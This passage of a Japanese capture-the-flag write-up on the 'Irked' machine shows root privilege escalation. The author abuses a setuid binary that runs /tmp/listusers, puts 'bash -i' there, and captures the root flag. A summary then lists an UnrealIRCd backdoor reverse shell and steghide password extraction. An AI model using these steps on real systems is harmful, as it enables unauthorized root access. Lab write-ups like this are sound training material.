    -rwxr-sr-x 1 root shadow 34424 May 27  2017 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
    -rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
    -rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
    -rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
    -rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount
    drwxr-sr-x 3 root systemd-journal 60 May 25 10:21 /run/log/journal
    drwxr-s--- 2 root systemd-journal 60 May 25 10:21 /run/log/journal/58827ab6b7d24c318344087f9268b9b5

ここから、/usr/bin/viewuserに着目するなら、さっきと何も違わない /usr/bin/viewuserを怪しいと思う直感を持たないといけない

roaris commented 1 month ago 
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-05-25 10:21 (:0)
djmardov pts/0        2024-05-25 13:19 (10.10.14.50)
sh: 1: /tmp/listusers: not found

/tmp/listusersがないと言われたので、とりあえず作ってみる

djmardov@irked:~$ touch /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-05-25 10:21 (:0)
djmardov pts/0        2024-05-25 13:19 (10.10.14.50)
sh: 1: /tmp/listusers: Permission denied

実行権限がなくて、Permission deniedと出ているはず 実行権限をつけると、エラーが出なくなった

djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-05-25 10:21 (:0)
djmardov pts/0        2024-05-25 13:19 (10.10.14.50)
roaris commented 1 month ago

つまり、/tmp/listusersでシェルを起動させれば、root権限でシェルが起動する root.txtゲット

djmardov@irked:~$ echo "bash -i" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-05-25 10:21 (:0)
djmardov pts/0        2024-05-25 13:19 (10.10.14.50)
root@irked:~# pwd
/home/djmardov
root@irked:~# cd /root
root@irked:/root# cat root.txt
1eeb03bc31a3b7a53f2e391db6d86bf2
roaris commented 1 month ago

解き方まとめ

  1. nmapで全ポートスキャンする
  2. irssiコマンドで、UnrealIRCdのバージョンが3.2.8.1であることを特定する
  3. UnrealIRCd 3.2.8.1のバックドアを使って、リバースシェルを実行する コマンドをbase64エンコードして送信しないと上手くいかないことに注意
  4. /home/djmardov/Documents/.backupに着目する
  5. ポート80で公開されている画像にステガノグラフィで隠された情報を、steghideコマンドと、/home/djmardov/Documents/.backupに書かれたパスワードを使って取りだす
  6. sshログインのパスワードが出てくるので、djmardovでsshログインしてuser.txtゲット
  7. setuidが設定されたファイルを列挙して、/usr/bin/viewuserが怪しいと思う
  8. /usr/bin/viewuserは/tmp/listusersを実行するようになっているので、/tmp/listusersでシェルを起動するようにして、root権限でシェルを起動し、root.txtゲット